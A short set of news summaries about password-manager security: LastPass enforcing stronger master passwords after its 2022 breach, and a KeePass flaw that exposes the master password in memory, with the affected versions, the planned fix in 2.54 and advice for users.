LastPass is enforcing a new security measure that requires users to set a stronger master password of at least 12 characters, including a special character, a number, and an uppercase letter. This move comes as a response to evolving cyber threats and follows a significant data breach in 2022 where hackers accessed sensitive user data. The company has already been applying this standard to new users or those resetting their passwords since last year, but now it's extending the requirement to all users to enhance the encryption keys for their vault data.
A newly discovered vulnerability in KeePass password manager allows retrieval of the master password in plaintext, even when the database is locked or the program is closed. A fix is expected to arrive in early June, but even after upgrading to the fixed version of KeePass, the master password may still be viewable in the program’s memory files. Users can reduce their exposure by not letting untrusted individuals access their computer, using a good antivirus program, and changing their master password after upgrading. This appears to be only a proof-of-concept concern, rather than an active exploit.
A major vulnerability has been discovered in the KeePass password manager that allows hackers to extract a user's master password in plain text from the target computer's memory, even if the app is locked or closed. The exploit requires physical access to the machine, but malware could be used to dump KeePass's memory and send it to the hacker's server. KeePass's developer is working on a fix, but it won't be released until June or July 2023. In the meantime, users should avoid downloading apps or opening files from unknown senders, use an antivirus app, and never share their password manager's master password with anyone.
A vulnerability in the KeePass password manager can be exploited to retrieve the master password from the software's memory. A PoC exploitation tool is publicly available, but the password can't be extracted remotely just by exploiting this flaw. The vulnerability affects the KeePass 2.X branch for Windows, and possibly for Linux and macOS. It has been fixed in the test versions of KeePass v2.54, with the official release expected by July 2023. KeepassXC, a fork of KeePassX, is not affected.
